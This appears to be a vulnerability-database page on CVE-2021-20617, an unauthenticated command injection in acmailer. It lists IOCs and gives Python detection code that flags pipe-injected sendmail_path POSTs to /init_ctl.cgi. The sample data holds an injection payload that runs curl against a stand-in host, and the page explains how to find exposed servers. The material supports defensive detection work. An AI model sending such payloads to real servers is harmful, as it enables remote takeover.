CVE-2021-20617
Published: 2021-01-14
Priority: P1 (82) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 7.87% (94.0th percentile)
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acmailer | acmailer | <= 4.0.1 | — |
| acmailer | acmailer_db | <= 1.1.3 | — |
| seeds_co_ltd | acmailer_and_acmailer_db | — | — |
Detection & IOCs (extracted from sources)
- Exploit targets the /init_ctl.cgi endpoint via HTTP POST with a pipe-injected sendmail_path parameter to trigger OS command execution via a curl callback (OOB/OAST detection).
- Successful exploitation results in an HTTP 302 redirect response; monitor for 302 responses from /init_ctl.cgi combined with OOB curl callbacks.
- OOB confirmation: look for inbound HTTP requests with 'User-Agent: curl' originating from the target server after a POST to /init_ctl.cgi.
- Content-Type of the exploit request is application/x-www-form-urlencoded; filter POST requests to /init_ctl.cgi with this content type and a pipe character in the sendmail_path field.
- Exposed acmailer instances can be discovered via Shodan/FOFA using the title fingerprint 'ACMAILER4.0'; use this to identify internet-facing vulnerable assets.
- The exploit payload uses a pipe-injected sendmail_path (|curl ...) to achieve OS command injection; the injection vector is the sendmail_path POST parameter, not a separate binary or config file.
- Vulnerability affects acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier; scope is limited to these version ranges.
- The attack vector is unauthenticated (PR:N, UI:N): no prior authentication or user interaction is required to exploit /init_ctl.cgi.
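The IOC list above can be turned directly into detection logic. The following Python is an added example written for this page, not code from the page's sources or from the acmailer project. It assumes two hypothetical record sources: request records from a proxy or WAF log that retains POST bodies (a plain Apache/nginx access log does not contain the body, so on such logs only the method, path and status checks can run), and egress records from the web server's outbound HTTP traffic with a User-Agent field. The function names, record fields and sample records are constructed for the example. The 302 status is used as the success signal named in the IOC list, combined with the body check rather than on its own.

```python
"""Detection logic for the CVE-2021-20617 exploitation pattern.

Added example (not from the page or the acmailer project). Record
shapes, field names and sample data are constructed for illustration.
"""
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# '&' is a form field separator and is handled by the parser, so it is
# not listed here; everything else is a shell metacharacter that has no
# business inside a sendmail path.
SHELL_META = ("|", ";", "`", "$(", "\n")


def suspicious_sendmail_path(body: str) -> bool:
    """True if any sendmail_path* field (URL-decoded) carries a shell metacharacter.

    parse_qs decodes %7C -> '|' and '+' -> ' ', so encoded payloads are caught.
    """
    fields = parse_qs(body, keep_blank_values=True)
    for name, values in fields.items():
        if not name.startswith("sendmail_path"):
            continue
        if any(m in v for v in values for m in SHELL_META):
            return True
    return False


def flag_requests(requests):
    """Return request records matching the exploit pattern from the IOC list:
    POST to /init_ctl.cgi, form-urlencoded body, injected sendmail_path.
    A 302 response on such a request is recorded as likely success."""
    hits = []
    for r in requests:
        if r["method"] != "POST" or r["path"].split("?")[0] != "/init_ctl.cgi":
            continue
        ctype = r.get("content_type", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            continue
        if not suspicious_sendmail_path(r.get("body", "")):
            continue
        hits.append({**r, "likely_success": r.get("status") == 302})
    return hits


def correlate_oob(hits, egress, window=timedelta(seconds=60)):
    """Pair each hit with outbound curl requests from the targeted server
    seen within `window` after the POST (the OOB callback in the IOC list)."""
    out = []
    for h in hits:
        t0 = h["ts"]
        callbacks = [
            e for e in egress
            if e["src"] == h["dst"]
            and "curl" in e.get("user_agent", "").lower()
            and t0 <= e["ts"] <= t0 + window
        ]
        out.append((h, callbacks))
    return out


# Constructed sample data: one exploit attempt, one legitimate setup POST, one GET.
T = datetime(2024, 12, 5, 10, 0, 0)
SAMPLE_REQUESTS = [
    {"ts": T, "src": "203.0.113.7", "dst": "198.51.100.10", "method": "POST",
     "path": "/init_ctl.cgi", "content_type": "application/x-www-form-urlencoded",
     "body": "admin_name=test&admin_pass=test"
             "&sendmail_path=%7Ccurl+http%3A%2F%2Fexample.invalid%2Fx",
     "status": 302},
    {"ts": T + timedelta(minutes=5), "src": "192.0.2.4", "dst": "198.51.100.10",
     "method": "POST", "path": "/init_ctl.cgi",
     "content_type": "application/x-www-form-urlencoded",
     "body": "admin_name=admin&sendmail_path=%2Fusr%2Fsbin%2Fsendmail", "status": 302},
    {"ts": T + timedelta(minutes=6), "src": "192.0.2.4", "dst": "198.51.100.10",
     "method": "GET", "path": "/init_ctl.cgi", "content_type": "", "body": "",
     "status": 200},
]
SAMPLE_EGRESS = [
    {"ts": T + timedelta(seconds=2), "src": "198.51.100.10",
     "dst": "example.invalid", "user_agent": "curl/7.68.0"},
    {"ts": T + timedelta(minutes=30), "src": "198.51.100.10",
     "dst": "updates.example", "user_agent": "apt-http/2.0"},
]


def run():
    """Flag exploit-shaped requests and attach any matching OOB callbacks."""
    return correlate_oob(flag_requests(SAMPLE_REQUESTS), SAMPLE_EGRESS)


if __name__ == "__main__":
    for hit, callbacks in run():
        print(hit["src"], "->", hit["path"], "success:", hit["likely_success"],
              "callbacks:", [c["dst"] for c in callbacks])
```

The body check is the discriminating part: a 302 from /init_ctl.cgi is also what a legitimate setup POST in the sample data returns, so it only counts once the sendmail_path field has been decoded and found to carry a metacharacter. The egress correlation is what confirms execution rather than just an attempt.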
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-6456-hr4p-p4pq: Improper access control vulnerability in acmailer ver
ghsa_unreviewed · 2022-05-24 · CVE-2021-20617 · CRITICAL · CWE-269
VulnCheck
Acmailer and Acmailer DB Survey Function Vulnerability
vulncheck · 2021 · CVE-2021-20617 · CRITICAL · CVSS 9.8
Affected: acmailer (vendor) / acmailer (product)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-12-05&host_type=src&vulnerability=cve-2021-20617; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-06-08&host_t
No detection rules found.
Nuclei
Acmailer - Improper Access Control to OS Command Injection
nuclei · CVE-2021-20617 · CRITICAL · CVSS 9.8
Template (truncated in the indexed copy):

```yaml
id: CVE-2021-20617

info:
  name: Acmailer - Improper Access Control to OS Command Injection
  author: daffainfo
  severity: critical
  description: |
    Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server vi
```
No writeups or analysis indexed.
Timeline: 2021-01-14 Published · Exploited in the wild